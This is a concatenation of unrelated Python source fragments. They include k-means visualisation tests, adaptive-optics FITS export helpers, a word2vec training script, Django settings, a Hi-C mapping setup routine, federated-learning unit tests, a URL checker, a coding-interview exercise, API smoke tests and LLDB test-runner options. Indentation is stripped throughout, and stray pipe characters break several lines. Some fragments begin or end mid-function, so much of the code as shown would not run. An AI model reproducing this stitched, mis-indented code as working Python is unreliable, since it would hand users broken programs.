centers = kmeans_instance.get_centers()
figure = kmeans_visualizer.show_clusters(sample, clusters, centers, initial_centers)
kmeans_visualizer.close(figure)
@staticmethod
def templateAnimateClusteringResultNoFailure(filename, initial_centers, ccore_flag):
sample = read_sample(filename)
observer = kmeans_observer()
kmeans_instance = kmeans(sample, initial_centers, 0.025, ccore_flag, observer=observer)
kmeans_instance.process()
kmeans_visualizer.animate_cluster_allocation(sample, observer)
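# Illustrative usage (not part of the original module): a concrete test case
# would call one of the templates above directly, e.g.
#
#     KmeansTestTemplates.templateClusterAllocationOneDimensionData(False)
#
# with ccore_flag=False selecting the pure-Python implementation.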
|
import numpy as np
from shesha.util.writers.common import dm
from shesha.util.writers.common import wfs
from shesha.util.writers.common import imat
from astropy.io import fits
def wfs_to_fits_hdu(sup, wfs_id):
"""Return a fits Header Data Unit (HDU) representation of a single WFS
Args:
sup : (compasSSupervisor) : supervisor
wfs_id : (int) : index of the WFS in the supervisor
Returns:
hdu : (ImageHDU) : fits representation of the WFS
"""
hdu_name = "WFS" + str(wfs_id)
X,Y = wfs.get_subap_pos_meter(sup, wfs_id)
valid_subap = np.array([X,Y],dtype=np.float64)
hdu = fits.ImageHDU( valid_subap, name=hdu_name)
hdu.header["NSSP"] = sup.config.p_wfss[wfs_id].get_nxsub()
hdu.header["SSPSIZE"] = sup.config.p_wfss[wfs_id].get_subapd()
return hdu
def dm_to_fits_hdu(sup, dm_id):
"""Return a fits Header Data Unit (HDU) representation of a single DM
Args:
        sup : (compasSSupervisor) : supervisor
        dm_id : (int) : index of the DM in the supervisor
Returns:
hdu : (ImageHDU) : fits representation of the DM
"""
hdu_name = "DM" + str(dm_id)
X,Y = dm.get_actu_pos_meter(sup, dm_id)
valid_subap = np.array([X,Y],dtype=np.float64)
hdu = fits.ImageHDU( valid_subap, name=hdu_name)
hdu.header["NACTU"] = sup.config.p_dms[dm_id].get_nact()
hdu.header["PITCH"] = sup.config.p_dms[dm_id].get_pitch()
hdu.header["COUPLING"] = sup.config.p_dms[dm_id].get_coupling()
hdu.header["ALT"] = sup.config.p_dms[dm_id].get_alt()
return hdu
def dm_influ_to_fits_hdu(sup, dm_id, *, influ_index=-1):
"""Return a fits Header Data Unit (HDU) holding the influence functions of a specific DM
Args:
        sup : (compasSSupervisor) : supervisor
        dm_id : (int) : index of the DM in the supervisor
Kwargs:
influ_index : (int) : (optional) default -1, index of the actuator to get the influence function from. -1 : get all influence functions
Returns:
hdu : (ImageHDU) : hdu holding the DM influence functions
"""
hdu_name = "INFLU_DM" + str(dm_id)
if influ_index < 0 :
influ_fct = sup.config.p_dms[dm_id].get_influ().astype(np.float64)
else :
influ_fct = sup.config.p_dms[dm_id].get_influ()[:,:,influ_index].astype(np.float64)
hdu = fits.ImageHDU( influ_fct, name=hdu_name)
return hdu
def write_data(file_name, sup, *, wfss_indices=None, dms_indices=None,
controller_id=0, influ=0, compose_type="controller"):
""" Write data for yao compatibility
write into a single fits:
        * number of valid subapertures
* number of actuators
* subapertures position (2-dim array x,y) in meters centered
* actuator position (2-dim array x,y) in pixels starting from 0
* interaction matrix (2*nSubap , nactu)
        * command matrix (nactu , 2*nSubap)
Args:
file_name : (str) : data file name
sup : (compasSSupervisor) : supervisor
    Kwargs:
wfss_indices : (list[int]) : optional, default all, list of the wfs indices to include
        dms_indices : (list[int]) : optional, default all, list of the DM indices to include
        controller_id : (int) : optional, index of the controller passed to yao
influ : (int) : optional, actuator index for the influence function
compose_type : (str) : optional, possibility to specify split tomography case ("controller" or "splitTomo")
"""
print("writing data to" + file_name)
hdul=fits.HDUList([])
# setting list of wfs and dm
conf = sup.config
if(wfss_indices is None):
wfss_indices = np.arange(len(conf.p_wfss))
if(dms_indices is None):
dms_indices = []
for i in range(len(conf.p_dms)):
if( conf.p_dms[i].type != "tt"):
dms_indices.append(i)
    # count the number of LGS
n_lgs = 0
for i in wfss_indices :
if(conf.p_wfss[i].get_gsalt() > 0):
n_lgs += 1
#primary hdu contains only keywords for sanity check
hdu = fits.PrimaryHDU(np.zeros(1,dtype=np.int32))
hdu.header["DIAM"] = conf.p_tel.get_diam()
hdu.header["COBS"] = conf.p_tel.get_cobs()
hdu.header["NLGS"] = n_lgs
hdu.header["NNGS"] = len(wfss_indices) - n_lgs
hdu.header["NDM" ] = len(dms_indices)
hdu.header["PIXSIZE"] = conf.p_geom.get_pixsize()
#add primary hdu to list
hdul.append(hdu)
# add wfss
for i in wfss_indices:
hdul.append( wfs_to_fits_hdu(sup, i))
# add dm
for i in dms_indices:
hdul.append(dm_to_fits_hdu(sup, i))
hdul.append(dm_influ_to_fits_hdu(sup, i, influ_index = influ))
if(controller_id > -1):
# IMAT
interaction_mat=imat.compose_imat(sup, compose_type=compose_type,
controller_id=controller_id)
hdu_imat=fits.ImageHDU(interaction_mat,name="IMAT")
# CMAT
hdu_cmat=fits.ImageHDU(sup.rtc.get_command_matrix(controller_id),
name="CMAT")
print("\t* number of subaperture per WFS")
print("\t* subapertures position")
print("\t* number of actuator per DM")
print("\t* actuators position")
print("\t* Imat")
print("\t* Cmat")
    hdul.writeto(file_name, overwrite=True)
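# Illustrative usage (not part of the original module), assuming a configured
# COMPASS supervisor `sup` is available; the file name is hypothetical:
#
#     write_data("compass_to_yao.fits", sup, controller_id=0, influ=0)
|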
"""
Compute WordVectors using Yelp Data
"""
from gensim.models.word2vec import Word2Vec
from util.language import detect_language, tokenize_text
from data_handling import get_reviews_data |
# Set to True to zero in on English reviews. Makes the process much slower
FILTER_ENGLISH = True
# Name for output w2v model file
OUTPUT_MODEL_FILE | = "w2v_yelp_100_alpha_0.025_window_4"
PICKLED_DATA = "/home/alfredo/deep-nlp/data/reviews.pickle."
NUM_PARTITIONS = 2  # range(1, NUM_PARTITIONS) selects the pickled partitions to load
reviews_texts, _, _, _, _ = get_reviews_data(range(1, NUM_PARTITIONS), PICKLED_DATA)
# Each review will be considered a sentence
sentences = []
for num, text in enumerate(reviews_texts):
if num % 10000 == 0:
print "%d out of %d reviews read" % (num, len(reviews_texts))
if FILTER_ENGLISH:
if detect_language(text) == u"english":
sentences.append(tokenize_text(text))
else:
sentences.append(text)
# Build a w2v model
w2v = Word2Vec(sentences=sentences, size=100, alpha=0.025, window=4, min_count=2, sample=1e-5, workers=4, negative=10)
w2v.save(OUTPUT_MODEL_FILE)
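# Illustrative follow-up (not in the original script): the trained model can be
# queried or reloaded later, e.g.
#   w2v.most_similar("pizza", topn=5)
#   w2v_reloaded = Word2Vec.load(OUTPUT_MODEL_FILE)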
|
# Django settings for python project.
DEBUG = True
import logging
LOG_LEVEL = logging.INFO
if DEBUG:
LOG_LEVEL = logging.DEBUG
logging.basicConfig(
level = LOG_LEVEL,
format = '[%(asctime)s %(name)s %(levelname)s] %(message)s',
)
TEMPLATE_DEBUG = DEBUG
ADMINS = (
# ('Your Name', 'your_email@domain.com'),
)
MANAGERS = ADMINS
DATABASE_ENGINE = '' # 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3' or 'ado_mssql'.
DATABASE_NAME = '' # Or path to database file if using sqlite3.
DATABASE_USER = '' # Not used with sqlite3.
DATABASE_PASSWORD = '' # Not used with sqlite3.
DATABASE_HOST = '' # Set to empty string for localhost. Not used with sqlite3.
DATABASE_PORT = '' # Set to empty string for default. Not used with sqlite3.
# Local time zone for this installation. Choices can be found here:
# http://www.postgresql.org/docs/8.1/static/datetime-keywords.html#DATETIME-TIMEZONE-SET-TABLE
# although not all variations may be possible on all operating systems.
# If running in a Windows environment this must be set to the same as your
# system time zone.
TIME_ZONE = 'America/Chicago'
# Language code for this installation. All choices can be found here:
# http://www.w3.org/TR/REC-html40/struct/dirlang.html#langcodes
# http://blogs.law.harvard.edu/tech/stories/storyReader$15
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# Absolute path to the directory that holds media.
# Example: "/home/media/media.lawrence.com/"
MEDIA_ROOT = ''
# URL that handles the media served from MEDIA_ROOT.
# Example: "http://media.lawrence.com"
MEDIA_URL = ''
# URL prefix for admin media -- CSS, JavaScript and images. Make sure to use a
# trailing slash.
# Examples: "http://foo.com/media/", "/media/".
ADMIN_MEDIA_PREFIX = '/media/'
# Make this unique, and don't share it with anybody.
SECRET_KEY = '!q2sh7ue8^=bu&wj9tb9&4fx^dayk=wnxo^mtd)xmw1y2)6$w$'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.load_template_source',
'django.template.loaders.app_directories.load_template_source',
# 'django.template.loaders.eggs.load_template_source',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.middleware.doc.XViewMiddleware',
)
ROOT_URLCONF = 'python.urls'
TEMPLATE_DIRS = (
# Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
)
|
if renz == 'NONE':
opts.renz[n] = None
continue
try:
_ = RESTRICTION_ENZYMES[renz]
except KeyError:
        print ('\n\nERROR: restriction enzyme %s not found.' % (renz)
               + ' Use one of:\n\n'
               + ' '.join(sorted(RESTRICTION_ENZYMES)) + '\n\n')
raise KeyError()
except AttributeError:
pass
# check skip
if not path.exists(opts.workdir) and opts.skip:
        print ('WARNING: cannot use output files (workdir not found), not skipping...')
opts.skip = False
# number of cpus
if opts.cpus == 0:
opts.cpus = cpu_count()
else:
opts.cpus = min(opts.cpus, cpu_count())
# check paths
if opts.mapper == 'gem' and not path.exists(opts.index):
raise IOError('ERROR: index file not found at ' + opts.index)
if not path.exists(opts.fastq):
raise IOError('ERROR: FASTQ file not found at ' + opts.fastq)
if not is_fastq(opts.fastq):
raise IOError(('ERROR: FASTQ file %s wrong format, check') % (opts.fastq))
try:
opts.windows = [[int(i) for i in win.split(':')]
for win in opts.windows]
except TypeError:
pass
mkdir(opts.workdir)
# write log
# if opts.mapping_only:
log_format = '[MAPPING {} READ{}] %(message)s'.format(opts.fastq, opts.read)
# else:
# log_format = '[DEFAULT] %(message)s'
# reset logging
logging.getLogger().handlers = []
try:
print('Writing log to ' + path.join(opts.workdir, 'process.log'))
logging.basicConfig(level=logging.INFO,
format=log_format,
filename=path.join(opts.workdir, 'process.log'),
filemode='a+')
except IOError:
logging.basicConfig(level=logging.DEBUG,
format=log_format,
filename=path.join(opts.workdir, 'process.log2'),
filemode='a+')
# to display log on stdout also
logging.getLogger().addHandler(logging.StreamHandler())
# write version log
vlog_path = path.join(opts.workdir, 'TADbit_and_dependencies_versions.log')
dependencies = get_dependencies_version()
if not path.exists(vlog_path) or open(vlog_path).readlines() != dependencies:
logging.info('Writing versions of TADbit and dependencies')
vlog = open(vlog_path, 'w')
vlog.write(dependencies)
vlog.close()
# check mapper extra options
if opts.mapper_param:
if (len(opts.mapper_param) == 1
and ('-' in opts.mapper_param[0] or
'--' in opts.mapper_param[0])):
# Single string surrounded by quotes
            opts.mapper_param = opts.mapper_param[0].split()
else:
opts.mapper_param = dict([o.split(':') for o in opts.mapper_param])
else:
opts.mapper_param = {}
if opts.mapper == 'gem' and opts.gem_version < 3:
gem_valid_option = set(["granularity", "q", "quality-format",
"gem-quality-threshold", "mismatch-alphabet",
"m", "e", "min-matched-bases",
"max-big-indel-length", "s", "strata-after-best",
"fast-mapping", "unique-mapping", "d", "D",
"allow-incomplete-strata", "max-decoded-matches",
"min-decoded-strata", "p", "paired-end-alignment",
"b", "map-both-ends", "min-insert-size",
"max-insert-size", "E", "max-extendable-matches",
"max-extensions-per-match", "unique-pairing"])
for k in opts.mapper_param:
            if k not in gem_valid_option:
                raise NotImplementedError(('ERROR: option "%s" not a valid GEM option '
                                           'or not supported by this tool.') % k)
    # create empty DB if it doesn't exist
dbpath = path.join(opts.workdir, 'trace.db')
open(dbpath, 'a').close()
# for lustre file system....
if 'tmpdb' in opts and opts.tmpdb:
dbdir = opts.tmpdb
# tmp file
dbfile = 'trace_%s' % (''.join([ascii_letters[int(random() * 52)]
for _ in range(10)]))
opts.tmpdb = path.join(dbdir, dbfile)
try:
copyfile(path.join(opts.workdir, 'trace.db'), opts.tmpdb)
except IOError:
pass
# check if job already run using md5 digestion of parameters
if already_run(opts):
if 'tmpdb' in opts and opts.tmpdb:
remove(path.join(dbdir, dbfile))
exit('WARNING: exact same job already computed, see JOBs table above')
@retry(lite.OperationalError, tries=20, delay=2)
def save_to_db(opts, dangling_ends, ligated, fig_path, outfiles, launch_time, finish_time):
"""
write little DB to keep track of processes and options
"""
if 'tmpdb' in opts and opts.tmpdb:
# check lock
while path.exists(path.join(opts.workdir, '__lock_db')):
time.sleep(0.5)
# close lock
open(path.join(opts.workdir, '__lock_db'), 'a').close()
# tmp file
dbfile = opts.tmpdb
try: # to copy in case read1 was already mapped for example
copyfile(path.join(opts.workdir, 'trace.db'), dbfile)
except IOError:
pass
else:
dbfile = path.join(opts.workdir, 'trace.db')
con = lite.connect(dbfile)
with con:
# check if table exists
cur = con.cursor()
cur.execute("""SELECT name FROM sqlite_master WHERE
type='table' AND name='MAPPED_INPUTs'""")
if not cur.fetchall():
try:
cur.execute("""
create table PATHs
(Id integer primary key,
JOBid int, Path text, Type text,
unique (Path))""")
except lite.OperationalError:
                pass  # may happen when mapped files have been cleaned
cur.execute("""
create table JOBs
(Id integer primary key,
Parameters text,
Launch_time text,
Finish_time text,
Type text,
Parameters_md5 text,
unique (Parameters_md5))""")
cur.execute("""
create table MAPPED_INPUTs
(Id integer primary key,
PATHid int,
Entries int,
Trim text,
Frag text,
Read int,
Enzyme text,
Dangling_Ends text,
Ligation_Sites text,
WRKDIRid int,
MAPPED_OUTPUTid int,
INDEXid int,
unique (PATHid,Entries,Read,Enzyme,WRKDIRid,MAPPED_OUTPUTid,INDEXid))""")
try:
parameters = digest_parameters(opts, get_md5=False)
param_hash = digest_parameters(opts, get_md5=True)
cur.execute("""
insert into JOBs
(Id , Parameters, Launch_time, Finish_time, Type , Parameters_md5)
values
(NULL, '%s', '%s', '%s', 'Map', '%s')
""" % (parameters,
time.strftime("%d/%m/%Y %H:%M:%S", launch_time),
time.strftime("%d/%m/%Y %H:%M:%S", finish_time), param_hash))
except lite.IntegrityError:
pass
jobid = get_jobid(cur)
add_path(cur, opts.workdir, 'WORKDIR', jobid)
add_path(cur, opts.fastq , 'MAPPED_FASTQ' , jobid, opts.workdir)
add_path(cur, opts.index , 'INDEX' , jobid, opts.workdir)
add_path(cur, fig_path , 'FIGURE' , jobid, opts.workdir)
for i, (out, num) in enumerate(outfiles):
try:
window = opts.windows[i]
except IndexError:
window = opts.windows[-1]
except TypeError:
window = 'None'
            add_path(cur, out, '2D_BED' if opts.read == 0 else 'SAM/MAP', jobid, opts.workdir)
|
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections
from absl.testing import parameterized
import tensorflow as tf
import tensorflow_federated as tff
from compressed_communication.aggregators.comparison_methods import one_bit_sgd
_test_integer_tensor_type = (tf.int32, (3,))
_test_float_struct_type = [(tf.float32, (2,)), (tf.float32, (3,))]
_test_float_tensor_type = (tf.float32, (3,))
class OneBitSGDComputationTest(tff.test.TestCase, parameterized.TestCase):
@parameterized.named_parameters(
("float_tensor", _test_float_tensor_type))
def test_one_bit_sgd_properties(self, value_type):
factory = one_bit_sgd.OneBitSGDFactory()
value_type = tff.to_type(value_type)
    process = factory.create(value_type)
self.assertIsInstance(process, tff.templates.AggregationProcess)
server_state_type = tff.type_at_server(())
expected_initialize_type = tff.FunctionType(
parameter=None, result=server_state_type)
self.assert_types_equivalent(process.initialize.type_signature,
expected_initialize_type)
expected_measurements_type = tff.type_at_server(
collections.OrderedDict(
avg_bitrate=tf.float32,
avg_distortion=tf.float32))
expected_next_type = tff.FunctionType(
parameter=collections.OrderedDict(
state=server_state_type, value=tff.type_at_clients(value_type)),
result=tff.templates.MeasuredProcessOutput(
state=server_state_type,
result=tff.type_at_server(value_type),
measurements=expected_measurements_type))
self.assert_types_equivalent(process.next.type_signature,
expected_next_type)
@parameterized.named_parameters(
("integer_tensor", _test_integer_tensor_type),
("float_struct", _test_float_struct_type))
def test_one_bit_sgd_create_raises(self, value_type):
factory = one_bit_sgd.OneBitSGDFactory()
value_type = tff.to_type(value_type)
self.assertRaises(ValueError, factory.create, value_type)
class OneBitSGDExecutionTest(tff.test.TestCase, parameterized.TestCase):
@parameterized.named_parameters(
("float_tensor", _test_float_tensor_type))
def test_correctness_positive(self, value_type):
factory = one_bit_sgd.OneBitSGDFactory()
value_type = tff.to_type(value_type)
process = factory.create(value_type)
state = process.initialize()
client_values = [tf.ones(value_type.shape, value_type.dtype)
for _ in range(2)]
expected_result = tf.ones(value_type.shape, value_type.dtype) * 2
bitstring_length = tf.size(expected_result, out_type=tf.float32) + 64.
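    # One sign bit per element plus a 64-bit overhead (presumably two float32
    # reconstruction values), so the average bitrate works out to (n + 64) / n.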
expected_avg_bitrate = bitstring_length / tf.size(expected_result,
out_type=tf.float32)
expected_measurements = collections.OrderedDict(
avg_bitrate=expected_avg_bitrate,
avg_distortion=0.0)
output = process.next(state, client_values)
self.assertAllClose(output.result, expected_result)
self.assertAllClose(output.measurements, expected_measurements)
@parameterized.named_parameters(
("float_tensor", _test_float_tensor_type))
def test_correctness_negative(self, value_type):
factory = one_bit_sgd.OneBitSGDFactory()
value_type = tff.to_type(value_type)
process = factory.create(value_type)
state = process.initialize()
client_values = [-1.0 * tf.ones(value_type.shape, value_type.dtype)
for _ in range(2)]
expected_result = tf.ones(value_type.shape, value_type.dtype) * -2
bitstring_length = tf.size(expected_result, out_type=tf.float32) + 64.
expected_avg_bitrate = bitstring_length / tf.size(expected_result,
out_type=tf.float32)
expected_measurements = collections.OrderedDict(
avg_bitrate=expected_avg_bitrate,
avg_distortion=0.0)
output = process.next(state, client_values)
self.assertAllClose(output.result, expected_result)
self.assertAllClose(output.measurements, expected_measurements)
@parameterized.named_parameters(
("float_tensor", _test_float_tensor_type))
def test_correctness_positive_negative(self, value_type):
factory = one_bit_sgd.OneBitSGDFactory()
value_type = tff.to_type(value_type)
process = factory.create(value_type)
state = process.initialize()
client_values = [[0.0, 2.0, -1.0] for _ in range(2)]
expected_result = [2.0, 2.0, -2.0]
bitstring_length = tf.size(expected_result, out_type=tf.float32) + 64.
expected_avg_bitrate = bitstring_length / tf.size(expected_result,
out_type=tf.float32)
expected_measurements = collections.OrderedDict(
avg_bitrate=expected_avg_bitrate,
avg_distortion=2./3.)
output = process.next(state, client_values)
self.assertAllClose(output.result, expected_result)
self.assertAllClose(output.measurements, expected_measurements)
@parameterized.named_parameters(
("float_tensor", _test_float_tensor_type))
def test_correctness_nonzero_threshold(self, value_type):
factory = one_bit_sgd.OneBitSGDFactory(2.)
value_type = tff.to_type(value_type)
process = factory.create(value_type)
state = process.initialize()
client_values = [[-1.0, 1.0, 2.0] for _ in range(2)]
expected_result = [0.0, 0.0, 4.0]
bitstring_length = tf.size(expected_result, out_type=tf.float32) + 64.
expected_avg_bitrate = bitstring_length / tf.size(expected_result,
out_type=tf.float32)
expected_measurements = collections.OrderedDict(
avg_bitrate=expected_avg_bitrate,
avg_distortion=2./3.)
output = process.next(state, client_values)
self.assertAllClose(output.result, expected_result)
self.assertAllClose(output.measurements, expected_measurements)
@parameterized.named_parameters(
("float_tensor", _test_float_tensor_type))
def test_correctness_one_client(self, value_type):
factory = one_bit_sgd.OneBitSGDFactory(2.)
value_type = tff.to_type(value_type)
process = factory.create(value_type)
state = process.initialize()
client_values = [[-1.0, 1.0, 2.0]]
expected_result = [0.0, 0.0, 2.0]
bitstring_length = tf.size(expected_result, out_type=tf.float32) + 64.
expected_avg_bitrate = bitstring_length / tf.size(expected_result,
out_type=tf.float32)
expected_measurements = collections.OrderedDict(
avg_bitrate=expected_avg_bitrate,
avg_distortion=2./3.)
output = process.next(state, client_values)
self.assertAllClose(output.result, expected_result)
self.assertAllClose(output.measurements, expected_measurements)
@parameterized.named_parameters(
("float_tensor", _test_float_tensor_type))
def test_correctness_different_clients(self, value_type):
factory = one_bit_sgd.OneBitSGDFactory(2.)
value_type = tff.to_type(value_type)
process = factory.create(value_type)
state = process.initialize()
client_values = [[-1.0, 1.0, 2.0], [1.0, 1.0, 1.0]]
expected_result = [1.0, 1.0, 3.0]
bitstring_length = tf.size(expected_result, out_type=tf.float32) + 64.
expected_avg_bitrate = bitstring_length / tf.size(expected_result,
out_type=tf.float32)
expected_measurements = collections.OrderedDict(
avg_bitrate=expected_avg_bitrate,
avg_distortion=2./6.)
output = process.next(state, client_values)
    self.assertAllClose(output.result, expected_result)
    self.assertAllClose(output.measurements, expected_measurements)
|
#!/usr/bin/python
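# Illustrative usage (not in the original script; the file name is hypothetical):
#   ./check_url.py example.com   -> exits 0 on HTTP 200, 2 otherwise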
import sys
import requests
try:
url = sys.argv[1]
    r = requests.get('http://%s' % url, timeout=3)
except requests.exceptions.Timeout:
print 'url timeout\n%s' %url
sys.exit(2)
except Exception:
print 'url error \n%s' %url
sys.exit(2)
url_status = r.status_code
if url_status == 200:
print 'url_status %s\n%s' %(url_status,url)
sys.exit(0)
else:
print 'url_status %s\n%s' %(url_status,url)
    sys.exit(2)
|
# CTCI 1.3
# URLify
import unittest
# My Solution
#-------------------------------------------------------------------------------
# CTCI Solution
def urlify(string, length):
'''function replaces single spaces with %20 and removes trailing spaces'''
new_index = len(string)
    for i in reversed(range(length)):
if string[i] == ' ':
# Replace spaces
string[new_index - 3:new_index] = '%20'
new_index -= 3
else:
# Move characters
string[new_index - 1] = string[i]
new_index -= 1
return string
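# Worked example (illustrative): urlify(list('Mr John Smith    '), 13) scans
# indices 12..0 from the right; each space found shifts '%20' into the trailing
# buffer, producing list('Mr%20John%20Smith').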
#-------------------------------------------------------------------------------
#Testing
class Test(unittest.TestCase):
'''Test Cases'''
# Using lists because Python strings are immutable
data = [
(list('much ado about nothing '), 22,
list('much%20ado%20about%20nothing')),
(list('Mr John Smith '), 13, list('Mr%20John%20Smith'))]
def test_urlify(self):
for [test_string, length, expected] in self.data:
actual = urlify(test_string, length)
self.assertEqual(actual, expected)
if __name__ == "__main__":
unittest.main()
|
# System imports
import os
from os.path import join
import pytest
from git import *
from PyGitUp.git_wrapper import RebaseError
from PyGitUp.tests import basepath, write_file, init_master, update_file, testfile_name
test_name = 'rebase_error'
repo_path = join(basepath, test_name + os.sep)
def setup():
master_path, master = init_master(test_name)
# Prepare master repo
master.git.checkout(b=test_name)
    # Clone to test repo
path = join(basepath, test_name)
master.clone(path, b=test_name)
repo = Repo(path, odbt=GitCmdObjectDB)
assert repo.working_dir == path
# Modify file in master
update_file(master, test_name)
# Modify file in our repo
contents = 'completely changed!'
repo_file = join(path, testfile_name)
write_file(repo_file, contents)
repo.index.add([repo_file])
repo.index.commit(test_name)
    # Modify file in master
update_file(master, test_name)
def test_rebase_error():
""" Run 'git up' with a failing rebase """
os.chdir(repo_path)
from PyGitUp.gitup import GitUp
gitup = GitUp(testing=True)
with pytest.raises(RebaseError):
gitup.run()
|
#!/usr/bin/env python
#! -*- coding: utf-8 -*-
from gi.repository import Cld
from gi.repository import DcsCore as dc
from gi.repository import DcsUI as du
from gi.repository import Gtk
class DcsExample(Gtk.Window):
def __init__(self):
Gtk.Window.__init__(self, title="DCS Example")
config = Cld.XmlConfig.with_file_name("examples/cld.xml")
self.context = Cld.Context.from_config(config)
        self.chan = self.context.get_object("ai0")
self.dev = self.context.get_object("dev0")
self.dev.open()
if(not self.dev.is_open):
print "Open device " + self.dev.id + " failed"
#self.task = self.context.get_object("tk0")
#self.task.run()
self.aictl = du.AIControl("/ai0")
self.aictl.connect("request_object", self.offer)
self.add(self.aictl)
    def offer(self, widget):
widget.offer_cld_object(self.chan)
win = DcsExample()
win.connect("delete-event", Gtk.main_quit)
win.show_all()
Gtk.main()
|
#!/usr/bin/python
import io
import os
import unittest
import logging
import uuid
from mediafire import MediaFireApi, MediaFireUploader, UploadSession
from mediafire.uploader import UPLOAD_SIMPLE_LIMIT_BYTES
APP_ID = '42511'
MEDIAFIRE_EMAIL = os.environ.get('MEDIAFIRE_EMAIL')
MEDIAFIRE_PASSWORD = os.environ.get('MEDIAFIRE_PASSWORD')
class MediaFireSmokeBaseTestCase(object):
"""Smoke tests for API"""
    class BaseTest(unittest.TestCase):
def setUp(self):
# Reset logging to info to avoid leaking credentials
logger = logging.getLogger('mediafire.api')
logger.setLevel(logging.INFO)
self.api = MediaFireApi()
session = self.api.user_get_session_token(
app_id=APP_ID, email=MEDIAFIRE_EMAIL,
password=MEDIAFIRE_PASSWORD)
self.api.session = session
@unittest.skipIf('CI' not in os.environ, "Running outside CI environment")
class MediaFireSmokeSimpleTest(MediaFireSmokeBaseTestCase.BaseTest):
"""Simple tests"""
def test_user_get_info(self):
result = self.api.user_get_info()
self.assertEqual(result["user_info"]["display_name"],
u"Coalmine Smoketest")
@unittest.skipIf('CI' not in os.environ, "Running outside CI environment")
class MediaFireSmokeWithDirectoryTest(MediaFireSmokeBaseTestCase.BaseTest):
"""Smoke tests requiring temporary directory"""
def setUp(self):
super(MediaFireSmokeWithDirectoryTest, self).setUp()
folder_uuid = str(uuid.uuid4())
result = self.api.folder_create(foldername=folder_uuid)
self.folder_key = result["folder_key"]
def tearDown(self):
self.api.folder_purge(self.folder_key)
def test_upload_small(self):
"""Test simple upload"""
# make sure we most likely will get upload/simple
data = b'This is a tiny file content: ' + os.urandom(32)
fd = io.BytesIO(data)
uploader = MediaFireUploader(self.api)
with UploadSession(self.api):
result = uploader.upload(fd, 'smallfile.txt',
folder_key=self.folder_key)
self.assertIsNotNone(result.quickkey)
self.assertEqual(result.action, 'upload/simple')
def test_upload_large(self):
"""Test large file upload"""
# make sure we will get upload/resumable, prefix + 4MiB
data = b'Long line is long: ' + os.urandom(UPLOAD_SIMPLE_LIMIT_BYTES)
fd = io.BytesIO(data)
uploader = MediaFireUploader(self.api)
with UploadSession(self.api):
result = uploader.upload(fd, 'bigfile.txt',
folder_key=self.folder_key)
self.assertIsNotNone(result.quickkey)
self.assertEqual(result.action, 'upload/resumable')
if __name__ == "__main__":
unittest.main()
|
with each list under a matching header (xfail files, xfail methods, skip files, skip methods)'''))
group.add_argument(
'-G',
'--category',
metavar='category',
action='append',
dest='categoriesList',
help=textwrap.dedent('''Specify categories of test cases of interest. Can be specified more than once.'''))
group.add_argument(
'--skip-category',
metavar='category',
action='append',
dest='skipCategories',
        help=textwrap.dedent('''Specify categories of test cases to skip. Takes precedence over -G. Can be specified more than once.'''))
# Configuration options
group = parser.add_argument_group('Configuration options')
    group.add_argument(
'--framework',
metavar='framework-path',
help='The path to LLDB.framework')
group.add_argument(
'--executable',
metavar='executable-path',
help='The path to the lldb executable')
group.add_argument(
'--server',
metavar='server-path',
help='The path to the debug server executable to use')
group.add_argument(
'--out-of-tree-debugserver',
dest='out_of_tree_debugserver',
action='store_true',
help='A flag to indicate an out-of-tree debug server is being used')
group.add_argument(
'-s',
metavar='name',
help='Specify the name of the dir created to store the session files of tests with errored or failed status. If not specified, the test driver uses the timestamp as the session dir name')
group.add_argument(
'-S',
'--session-file-format',
default=configuration.session_file_format,
metavar='format',
help='Specify session file name format. See configuration.py for a description.')
group.add_argument(
'-y',
type=int,
metavar='count',
help="Specify the iteration count used to collect our benchmarks. An example is the number of times to do 'thread step-over' to measure stepping speed.")
group.add_argument(
'-#',
type=int,
metavar='sharp',
dest='sharp',
help='Repeat the test suite for a specified number of times')
group.add_argument('--channel', metavar='channel', dest='channels', action='append', help=textwrap.dedent(
"Specify the log channels (and optional categories) e.g. 'lldb all' or 'gdb-remote packets' if no categories are specified, 'default' is used"))
group.add_argument(
'--log-success',
dest='log_success',
action='store_true',
help="Leave logs/traces even for successful test runs (useful for creating reference log files during debugging.)")
group.add_argument(
'--codesign-identity',
metavar='Codesigning identity',
default='lldb_codesign',
help='The codesigning identity to use')
group.add_argument(
'--build-dir',
dest='test_build_dir',
metavar='Test build directory',
default='lldb-test-build.noindex',
help='The root build directory for the tests. It will be removed before running.')
# Configuration options
group = parser.add_argument_group('Remote platform options')
group.add_argument(
'--platform-name',
dest='lldb_platform_name',
metavar='platform-name',
help='The name of a remote platform to use')
group.add_argument(
'--platform-url',
dest='lldb_platform_url',
metavar='platform-url',
help='A LLDB platform URL to use when connecting to a remote platform to run the test suite')
group.add_argument(
'--platform-working-dir',
dest='lldb_platform_working_dir',
metavar='platform-working-dir',
help='The directory to use on the remote platform.')
# Test-suite behaviour
group = parser.add_argument_group('Runtime behaviour options')
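    # 'X' is a shorthand helper defined earlier in this file (outside this
    # excerpt) that registers a boolean flag on the current argument group.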
X('-d', 'Suspend the process after launch to wait indefinitely for a debugger to attach')
X('-q', "Don't print extra output from this script.")
X('-t', 'Turn on tracing of lldb command and other detailed test executions')
group.add_argument(
'-u',
dest='unset_env_varnames',
metavar='variable',
action='append',
help='Specify an environment variable to unset before running the test cases. e.g., -u DYLD_INSERT_LIBRARIES -u MallocScribble')
group.add_argument(
'--env',
dest='set_env_vars',
metavar='variable',
action='append',
help='Specify an environment variable to set to the given value before running the test cases e.g.: --env CXXFLAGS=-O3 --env DYLD_INSERT_LIBRARIES')
